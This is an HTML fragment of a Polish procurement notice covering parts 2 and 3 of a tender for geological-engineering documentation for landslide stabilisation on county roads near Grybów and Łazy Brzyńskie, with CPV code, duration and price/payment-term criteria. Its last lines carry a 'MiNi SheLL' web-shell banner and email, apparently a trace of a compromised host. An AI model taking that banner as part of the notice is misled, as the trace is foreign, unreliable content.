<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Wykonanie dokumentacji geologiczno - inżynierskiej w ramach zadania pn. Stabilizacja i zabezpieczenie usuwiska wraz z odbudową drogi powiatowej nr 1572 K Grybów - Krużlowa Niżna - (na ul. Węgierskiej w m. Grybów) w km 0+410 
- 0+440.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji geologiczno - inżynierskiej w ramach zadania pn. Stabilizacja i zabezpieczenie usuwiska wraz z odbudową drogi powiatowej nr 1572 K Grybów - Krużlowa Niżna - (na ul. Węgierskiej w m. Grybów) w km 0+410 
- 0+440.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Wykonanie dokumentacji geologiczno - inżynierskiej w ramach zadania pn. Stabilizacja i zabezpieczenie usuwiska wraz z odbudową drogi powiatowej nr 1537 K Gołkowice Górne - Łazy Brzyńskie w m. Łazy Brzyńskie w km 3+720 - 3+740.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji geologiczno - inżynierskiej w ramach zadania pn. Stabilizacja i zabezpieczenie usuwiska wraz z odbudową drogi powiatowej nr 1537 K Gołkowice Górne - Łazy Brzyńskie w m. Łazy Brzyńskie w km 3+720 - 3+740.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com